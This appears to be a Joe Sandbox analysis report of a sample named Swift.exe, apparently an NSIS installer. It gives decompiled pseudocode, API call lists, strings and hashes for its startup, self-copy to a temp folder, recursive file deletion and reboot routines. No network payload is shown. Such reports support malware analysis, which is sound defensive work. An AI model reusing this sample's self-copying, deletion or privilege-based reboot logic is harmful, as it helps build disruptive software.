							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405B85("C:\\Users\\jones\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108);
								_t53 = E004030C0(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C38(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x7a2814;
											if( *0x7a2814 == 0) {
												L62:
												_t56 =  *0x7a282c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00405F11(5);
											_t111 = E00405F11(6);
											_t59 = E00405F11(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00405F11(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E00405446( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x7a279c == 0) {
										L34:
										 *0x7a282c =  *0x7a282c | 0xffffffff;
										 *(_t121 + 0x18) = E004035D8( *0x7a282c);
										goto L35;
									}
									_t115 = E004056A3(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E004053CD(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\jones\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E004053B0();
											} else {
												E00405333();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405B85("C:\\Users\\jones\\AppData\\Local\\Temp", _t119);
											}
											E00405B85(0x7a3000,  *(_t121 + 0x1c));
											 *0x7a3400 = 0x41;
											_t120 = 0x1a;
											do {
												E00405BA7(0, _t108, 0x79d948, 0x79d948,  *((intOrPtr*)( *0x7a2790 + 0x120)));
												DeleteFileA(0x79d948);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\jones\\Desktop\\Swift.exe", 0x79d948, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x79d948);
														E004058D3(_t140);
														E00405BA7(0, _t108, 0x79d948, 0x79d948,  *((intOrPtr*)( *0x7a2790 + 0x124)));
														_t87 = E004053E5(0x79d948);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x7a3400 =  *0x7a3400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E004058D3(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E00405759(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405B85("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									E00405B85("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E004030C0(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}

0x00403102
0x00403106
0x0040310e
0x00403110
0x00403115
0x00403125
0x00403128
0x0040312f
0x00403136
0x00403136
0x0040312f
0x0040313d
0x00403147
0x00403151
0x00403158
0x0040315f
0x00403164
0x00403169
0x00403170
0x00403176
0x0040318c
0x0040319c
0x004031a1
0x004031a7
0x004031ae
0x004031c1
0x004031c6
0x004031c8
0x004031ca
0x004031cf
0x004031cf
0x004031df
0x004031e5
0x0040324e
0x0040324e
0x00403250
0x00403252
0x00000000
0x00000000
0x004031eb
0x004031ee
0x004031f6
0x004031f6
0x004031f9
0x004031fe
0x00403200
0x00403200
0x00403201
0x00403201
0x00403206
0x00403209
0x0040323e
0x00403243
0x00403248
0x0040324b
0x0040324d
0x0040324d
0x0040324d
0x00000000
0x0040320b
0x0040320b
0x0040320c
0x0040320f
0x00403217
0x0040321a
0x0040321c
0x0040321c
0x0040321c
0x0040321a
0x0040321f
0x00403225
0x0040322d
0x00403230
0x00403232
0x00403232
0x00403232
0x00403230
0x00403235
0x0040323c
0x00403256
0x00403259
0x00403262
0x00403267
0x00403267
0x00403272
0x00403278
0x0040327d
0x0040327f
0x004032a1
0x004032a6
0x004032ad
0x004032b4
0x004032b8
0x0040331f
0x0040331f
0x00403324
0x0040332a
0x0040332e
0x00403443
0x00403449
0x004034e6
0x004034e6
0x004034eb
0x004034ee
0x004034f0
0x004034f0
0x004034f8
0x004034f8
0x00403458
0x00403461
0x00403463
0x00403468
0x0040346a
0x0040346c
0x0040346e
0x00403470
0x00403472
0x00403474
0x00403484
0x00403486
0x00403488
0x00403495
0x004034a4
0x004034ac
0x004034b4
0x004034b4
0x00403488
0x00403474
0x00403470
0x004034b8
0x004034bd
0x004034c4
0x004034d2
0x004034d5
0x004034db
0x004034dd
0x00000000
0x00000000
0x00000000
0x004034c6
0x004034cc
0x004034ce
0x004034d0
0x004034df
0x004034e1
0x00000000
0x004034e1
0x00000000
0x004034d0
0x004034c4
0x0040333d
0x00403344
0x00403344
0x004032c0
0x0040330f
0x0040330f
0x0040331b
0x00000000
0x0040331b
0x004032c9
0x004032d6
0x004032cd
0x004032d3
0x00000000
0x00000000
0x004032d5
0x004032d5
0x004032d5
0x004032da
0x004032dc
0x004032e4
0x00403355
0x00403357
0x0040335e
0x00403366
0x00403366
0x00403371
0x00403376
0x00403385
0x00403389
0x0040338a
0x00403393
0x0040338c
0x0040338c
0x0040338c
0x00403399
0x0040339f
0x004033a5
0x004033ad
0x004033ad
0x004033bb
0x004033c2
0x004033cb
0x004033d1
0x004033dd
0x004033e3
0x004033ed
0x004033f7
0x004033fd
0x004033ff
0x00403401
0x00403402
0x00403403
0x00403414
0x0040341a
0x00403421
0x00403424
0x0040342a
0x0040342a
0x00403421
0x004033ff
0x0040342e
0x00403434
0x00403434
0x00403434
0x00403437
0x00403438
0x00403439
0x00403439
0x00000000
0x00403385
0x004032e6
0x004032e8
0x004032f3
0x00000000
0x00000000
0x004032fb
0x00403306
0x0040330b
0x00000000
0x0040330b
0x00403287
0x00403293
0x00403298
0x0040329d
0x0040329f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040323c
0x00000000
0x00000000
0x00000000
0x004031f0
0x004031f0
0x004031f0
0x004031f1
0x004031f1
0x00000000
0x004031f0
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403115
GetVersion.KERNEL32 ref: 0040311B
#17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00403169
OleInitialize.OLE32(00000000), ref: 00403170
SHGetFileInfoA.SHELL32(0079DD48,00000000,?,00000160,00000000), ref: 0040318C
GetCommandLineA.KERNEL32(007A1F80,NSIS Error), ref: 004031A1
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Swift.exe",00000000), ref: 004031B4
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Swift.exe",00409188), ref: 004031DF
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403272
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403287
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403293
DeleteFileA.KERNELBASE(1033), ref: 004032A6

Part of subcall function 00405F11: GetModuleHandleA.KERNEL32(?,?,00000000,0040315D,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F23
Part of subcall function 00405F11: GetProcAddress.KERNEL32(00000000,?), ref: 00405F3E

ExitProcess.KERNEL32(00000000), ref: 0040331F
OleUninitialize.OLE32(00000000), ref: 00403324
ExitProcess.KERNEL32 ref: 00403344
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Swift.exe",00000000,00000000), ref: 00403357
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Swift.exe",00000000,00000000), ref: 00403366
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Swift.exe",00000000,00000000), ref: 00403371
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Swift.exe",00000000,00000000), ref: 0040337D
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403399
DeleteFileA.KERNEL32(0079D948,0079D948,?,007A3000,?), ref: 004033E3
CopyFileA.KERNEL32(C:\Users\user\Desktop\Swift.exe,0079D948,00000001), ref: 004033F7
CloseHandle.KERNEL32(00000000,0079D948,0079D948,?,0079D948,00000000), ref: 00403424
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 0040347D
ExitWindowsEx.USER32(00000002,80040002), ref: 004034D5
ExitProcess.KERNEL32 ref: 004034F8

Strings

.tmp, xrefs: 0040336B
UXTHEME, xrefs: 00403138
_?=, xrefs: 004032CD
SeShutdownPrivilege, xrefs: 0040348F
C:\Users\user\AppData\Local\Temp, xrefs: 00403301
~nsu, xrefs: 0040334F
NSIS Error, xrefs: 00403192
"C:\Users\user\Desktop\Swift.exe", xrefs: 004031A7, 004031AD, 004032C3
C:\Users\user\AppData\Local\Temp\, xrefs: 00403267, 0040326C, 00403286, 00403292, 00403354, 00403365, 00403370, 0040337C, 00403389, 00403398, 00403438
C:\Users\user\Desktop\Swift.exe, xrefs: 004033F2
C:\Users\user\Desktop, xrefs: 00403376, 0040337B, 004033A7
SETUPAPI, xrefs: 0040314C
NCRC, xrefs: 0040321F
1033, xrefs: 004032A1
, xrefs: 00403110
C:\Users\user\AppData\Local\Temp, xrefs: 0040325D, 004032F6, 0040339F, 004033A8
USERENV, xrefs: 00403142
/D=, xrefs: 00403235
\Temp, xrefs: 0040328D
Error launching installer, xrefs: 004032DC
", xrefs: 00403201

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Swift.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Swift.exe$Error launching installer$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
API String ID: 2193684524-580783823
Opcode ID: 5637f880744a912605ab1799ab0c9292901b5660924d0c1cf94d356a1da6fdb8
Instruction ID: 5403ffeb24016cb84f0ac50500886be848db9db9d8162e7140c1f181288b6b91
Opcode Fuzzy Hash: 5637f880744a912605ab1799ab0c9292901b5660924d0c1cf94d356a1da6fdb8
Instruction Fuzzy Hash: C1A1B2709083416EE7216F718C4AB2B7EACEB86705F00457FF541B61D2CA7C9E458A6F

Uniqueness

Uniqueness Score: -1.00%

Function 004054AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004054AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405759(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x7a2808 =  *0x7a2808 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B85(0x79fd98, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056BF(_t72);
					} else {
						lstrcatA(0x79fd98, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x79fd98,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040583D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E71(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x7a2808 =  *0x7a2808 + 1;
										} else {
											E00404E71(0xfffffff1, _t72);
											E004058D3(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x79fd98 - 0x5c;
					if( *0x79fd98 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E80(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405678(_t72);
							E0040583D(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E71(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E71(0xfffffff1, _t72);
							return E004058D3(__eflags, _t72, 0);
						}
						L33:
						 *0x7a2808 =  *0x7a2808 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004054b5
0x004054b9
0x004054c2
0x004054c5
0x004054c8
0x004054d0
0x004054d2
0x004054d3
0x00000000
0x004054d3
0x004054e2
0x004054e2
0x004054e5
0x004054e8
0x004054fc
0x00405503
0x00405508
0x0040550a
0x0040551a
0x0040550c
0x00405512
0x00405512
0x0040551f
0x00405522
0x0040552d
0x00405533
0x00405538
0x00405548
0x0040554a
0x00405550
0x00405553
0x00405556
0x00405613
0x00405613
0x00405617
0x00405619
0x00405619
0x00405619
0x00405619
0x00000000
0x00000000
0x00000000
0x00000000
0x0040555c
0x0040555c
0x00405565
0x0040556b
0x00405570
0x00405573
0x00405575
0x00405579
0x0040557b
0x0040557b
0x00405579
0x0040557e
0x00405581
0x00405594
0x00405596
0x0040559b
0x004055a2
0x004055ba
0x004055c0
0x004055c6
0x004055c8
0x004055ed
0x004055ca
0x004055ca
0x004055ce
0x004055e2
0x004055d0
0x004055d3
0x004055db
0x004055db
0x004055ce
0x004055a4
0x004055aa
0x004055ac
0x004055b2
0x004055b2
0x004055ac
0x00000000
0x004055a2
0x00405583
0x00405586
0x00405588
0x00000000
0x00000000
0x0040558a
0x0040558c
0x00000000
0x00000000
0x0040558e
0x00405592
0x00000000
0x00000000
0x00000000
0x004055f2
0x004055fc
0x00405602
0x00405602
0x0040560d
0x00000000
0x0040560d
0x00405524
0x0040552b
0x00000000
0x00000000
0x00000000
0x004054ea
0x004054ea
0x004054ec
0x0040561d
0x00405620
0x00405623
0x00405675
0x00405675
0x00405675
0x00405625
0x00405628
0x00405633
0x00405638
0x0040563a
0x00000000
0x00000000
0x0040563d
0x00405643
0x00405649
0x0040564f
0x00405651
0x00000000
0x0040566d
0x00405653
0x00405657
0x00000000
0x00000000
0x0040565c
0x00000000
0x00405663
0x0040562a
0x0040562a
0x00000000
0x0040562a
0x004054f2
0x004054f6
0x00000000
0x00000000
0x00000000
0x004054f6

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004054C8
lstrcatA.KERNEL32(0079FD98,\*.*,0079FD98,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405512
lstrcatA.KERNEL32(?,00409010,?,0079FD98,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405533
lstrlenA.KERNEL32(?,?,00409010,?,0079FD98,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405539
FindFirstFileA.KERNELBASE(0079FD98,?,?,?,00409010,?,0079FD98,?,00000000,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040554A
FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 004055FC
FindClose.KERNELBASE(?), ref: 0040560D

Strings

\*.*, xrefs: 0040550C
"C:\Users\user\Desktop\Swift.exe", xrefs: 004054AA
C:\Users\user\AppData\Local\Temp\, xrefs: 004054B4

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Swift.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1086131176
Opcode ID: fb81ec08fc59f8c686c3e1e235259664e3ac338d04bfde0d9c1496596c42f777
Instruction ID: 43222b4474e4763c85df2cef532dbce35fce359719e8b423b5ff9d14b4f7d1f0
Opcode Fuzzy Hash: fb81ec08fc59f8c686c3e1e235259664e3ac338d04bfde0d9c1496596c42f777
Instruction Fuzzy Hash: 3251C030404A487ADB216B318C85BBF3AB9DF82714F54847BF905751D2C73C5982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405E80(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7a0de0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a0de0;
			}

0x00405e8b
0x00405e94
0x00000000
0x00405ea1
0x00405e97
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,007A0DE0,C:\,0040579C,C:\,C:\,00000000,C:\,C:\,?,?,00000000,004054BE,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8B
FindClose.KERNEL32(00000000), ref: 00405E97

Strings

z, xrefs: 00405E81
C:\, xrefs: 00405E80

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\$z
API String ID: 2295610775-1245586900
Opcode ID: 1a99c79506b9af08b0f87891238bd5b8f84e75f28d70f3458bd2f1abcd664509
Instruction ID: 4cf8279d868a5200c4ffdf6c7734e33c634744571818d2d45139dd9273c698d7
Opcode Fuzzy Hash: 1a99c79506b9af08b0f87891238bd5b8f84e75f28d70f3458bd2f1abcd664509
Instruction Fuzzy Hash: 3ED012719084209BC7041778ED0C85F7A58DB8A3707108F32F565F52E0C338AC52CAE9

Uniqueness

Uniqueness Score: -1.00%

Function 004035D8 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035D8(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x7a2790;
				_t20 = E00405F11(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x79ed90;
					"1033" = 0x7830;
					E00405A6C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79ed90, 0);
					__eflags =  *0x79ed90;
					if(__eflags == 0) {
						E00405A6C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x79ed90, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AE3("1033",  *_t20() & 0x0000ffff);
				}
				E004038A1(_t76, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a2800 =  *0x7a2798 & 0x00000020;
				 *0x7a281c = 0x10000;
				if(E00405759(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405759(_t96, _t84) == 0) {
						E00405BA7(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x7a2780, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a1f68 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038A1(_t76, __eflags);
							__eflags =  *0x7a2820;
							if( *0x7a2820 != 0) {
								_t31 = E00404F43(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a1f4c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x79ed68, 5);
							_t37 = E00405EA7("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EA7("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x7a1f20);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7a1f20);
								 *0x7a1f44 = _t85;
								RegisterClassA(0x7a1f20);
							}
							_t39 =  *0x7a1f60; // 0x0
							_t42 = DialogBoxParamA( *0x7a2780, _t39 + 0x00000069 & 0x0000ffff, 0, E0040396E, 0);
							E00403528(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x7a2780;
						 *0x7a1f34 = _t28;
						_v20 = 0x624e5f;
						 *0x7a1f24 = E00401000;
						 *0x7a1f30 =  *0x7a2780;
						 *0x7a1f44 =  &_v20;
						if(RegisterClassA(0x7a1f20) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
